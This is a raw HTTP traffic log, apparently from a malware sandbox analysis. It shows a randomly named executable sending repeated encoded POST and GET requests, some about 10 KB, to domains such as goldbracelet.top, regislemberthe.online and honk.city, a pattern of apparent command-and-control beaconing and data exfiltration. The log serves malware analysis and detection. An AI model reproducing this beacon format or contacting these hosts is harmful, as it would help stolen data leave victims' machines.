                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50031 | 199.192.23.123 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:38:13.479942083 CET | 10807 | OUT | POST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Data Ascii: sTS= [TRUNCATED]
Jan 11, 2025 09:38:14.130098104 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:13 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50032 | 199.192.23.123 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:38:16.016175985 CET | 440 | OUT | GET /6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:38:16.639950037 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:16 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50033 | 104.21.36.239 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:38:21.857431889 CET | 714 | OUT | POST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=QTR40tOSZ0kPsUEVN1C0Bx3OGcfTE1oFw2EVx440FZtVPlcvN1g6E8vEbTebDgv3iBZGvTvHvOoCsBXGG/fVc9AOoSrJbXVxh1p7Vqj1AveI4dNaEr1XGnwSce4e3YWLrf4AmSrchg6NWpYrsPXhGTy2pDHOh4R3J3OsTrQjAOsnglFwL64VqWARZ/lGXI0plg==
Jan 11, 2025 09:38:22.331737995 CET | 978 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:22 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgAp4OZBr9WUTAx15luT7q1YLAAyI%2FwJJD7iK7jdfJrpXgPMzm%2FHkmRuffp4pw4eNlR0fIursOBn22YEY1TVLQi2DTIsw1HYs7NRtbk28sD2ZiP2l7%2F7JcAuUgGujYLEatIyJCvEfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900397151dde4285-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50034 | 104.21.36.239 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:38:24.411268950 CET | 734 | OUT | POST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv9VPA4vO0g6UsvEQzeSHgvsiBUxvR7HvKACsBnGHMHUetAAkyrLGnVxh1p7Vq2oAvGI7ulaFPhUdHwRbe4ehoWPrf4imTH2hl+NWrwrvdviPTyK0zGmgdMQI075b6oBfKdFljIqaLZC4WkiE4syaLJg+ucUHOXRV5UeOBXWCQjcKmg=
Jan 11, 2025 09:38:24.892164946 CET | 981 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOlK6JPWivihzn1jbufvQePljqU0bfXC5wTFyAPQctq%2FhwYlx0EFFvji1%2BZHjGofLNz7QaF%2FRL6D6X5A6NuL5L%2BsYO9rDvtsG7WVpZTnw3xPwEK5rB6YUcBVs67riC3Ha1kiNBS2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 9003972518b70c88-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50035 | 104.21.36.239 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:38:26.960139990 CET | 10816 | OUT | POST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:27.454440117 CET, Bytes transferred: 981, Direction: IN, Data:
                                                                                                                                      HTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:27 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YVygnqjWPGPr9NBEGFCsdGiBT65M%2F2Nrc290OqWsEATzcVtEei0twVSkQwcuiC7q5KxGBM7Ka9pWl7jdW5cLSk7GqD7EB6CnKjZ%2FreEXOnosE0xAZHd5XknHUvHckjAhoJZKUKiMlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900397351e9c43b9-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2513&min_rtt=2513&rtt_var=1256&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10816&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                                      Session ID: 28, Source IP: 192.168.2.4, Source Port: 50036, Destination IP: 104.21.36.239, Destination Port: 80, PID: 4588, Process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:29.501317978 CET, Bytes transferred: 443, Direction: OUT, Data:
                                                                                                                                      GET /eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:29.971736908 CET, Bytes transferred: 1236, Direction: IN, Data:
                                                                                                                                      HTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:29 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PI6f6bb8MkEFrNmwW4fj%2Bq7LIIkxnRAsHJYFg390iUJXN7HNwbgu5%2FCZWBlgFZOD5s5ce6uHy7fh68SMLKI%2FX9bTl6FAUhyPnVpHgYawPwYMih4StHzNGhZ6UxTcFhByA0Yd85dhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039744dc1343b1-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2497&min_rtt=2497&rtt_var=1248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:29.971754074 CET, Bytes transferred: 102, Direction: IN, Data:
                                                                                                                                      Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                      Session ID: 29, Source IP: 192.168.2.4, Source Port: 50037, Destination IP: 208.91.197.27, Destination Port: 80, PID: 4588, Process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:35.241518021 CET, Bytes transferred: 729, Direction: OUT, Data:
                                                                                                                                      POST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)


                                                                                                                                      Session ID: 30, Source IP: 192.168.2.4, Source Port: 50038, Destination IP: 208.91.197.27, Destination Port: 80, PID: 4588, Process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:37.793903112 CET, Bytes transferred: 749, Direction: OUT, Data:
                                                                                                                                      POST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)


                                                                                                                                      Session ID: 31, Source IP: 192.168.2.4, Source Port: 50039, Destination IP: 208.91.197.27, Destination Port: 80, PID: 4588, Process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:40.348731041 CET, Bytes transferred: 10831, Direction: OUT, Data:
                                                                                                                                      POST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)


                                                                                                                                      Session ID: 32, Source IP: 192.168.2.4, Source Port: 50040, Destination IP: 208.91.197.27, Destination Port: 80, PID: 4588, Process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:42.890602112 CET, Bytes transferred: 448, Direction: OUT, Data:
                                                                                                                                      GET /1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:44.007908106 CET, Bytes transferred: 1236, Direction: IN, Data:
                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:42 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                      Set-Cookie: vsid=908vr484130323111234078; expires=Thu, 10-Jan-2030 08:38:43 GMT; Max-Age=157680000; path=/; domain=www.regislemberthe.online; HttpOnly
                                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UQgn1IyGZPQ55Cusm3xlfY0brCLHKspycc3tml+FNVbURBa5Z+qy3j3T8FTF3MlKKYB7jA6YI7fvaCovGArY2Q==
                                                                                                                                      Content-Length: 2621
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UQgn1IyGZPQ55Cusm3xlfY0brCLHKspycc3tml+FNVbURBa5Z+qy3j3T8FTF3MlKKYB7jA6
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:44.007925034 CET, Bytes transferred: 1236, Direction: IN, Data:
                                                                                                                                      Data Ascii: YI7fvaCovGArY2Q=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><s
                                                                                                                                      Timestamp: Jan 11, 2025 09:38:44.007939100 CET, Bytes transferred: 1145, Direction: IN, Data:
                                                                                                                                      Data Ascii: ntent="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=devi


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      33 | 192.168.2.4 | 50041 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:49.063225031 CET | 693 | OUT | POST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=o0J+MpKGqHuAsBF/gjOzgEZh5EM5YJ68g3ErOyFxZTRFdk6U3df4aVtPlwlmM7TbXK86unz3vaT7qESnQnZTFAZvqyqlWTa6p0DgfJyafjZ/MbGqDtBRZ7ePOApmRDk1sW9+fztW1sxLLckg5/35LoV/qZ7jf9VLxVl5OJb/DKVarr75yMmjD+wLOmVsV00wdw==
                                                                                                                                      Jan 11, 2025 09:38:49.504785061 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      34 | 192.168.2.4 | 50042 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:51.616745949 CET | 713 | OUT | POST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh1FdBeU2cf4bVtPtQlZRrTAXKwMunP3vaH7qFinQ0BSEQZt0SqdSTa6p0DgfJmgfjB/Mq2qCMBQGLeAJApmGTkPsW9Yf3tw1q1LLesg5qD4BoVx0p6MQPY/2gYQRJ2bKYhrut2jj9H0R+U4ThcYY3J5G7m1IkejcTOotHYaNdIBliU=
                                                                                                                                      Jan 11, 2025 09:38:52.055505037 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      35 | 192.168.2.4 | 50043 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:54.167208910 CET | 10795 | OUT | POST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:54.612377882 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      36 | 192.168.2.4 | 50044 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:56.703665972 CET | 436 | OUT | GET /c8xp/?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:58.165707111 CET | 377 | IN | HTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:38:58 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf"}</script></head></html>


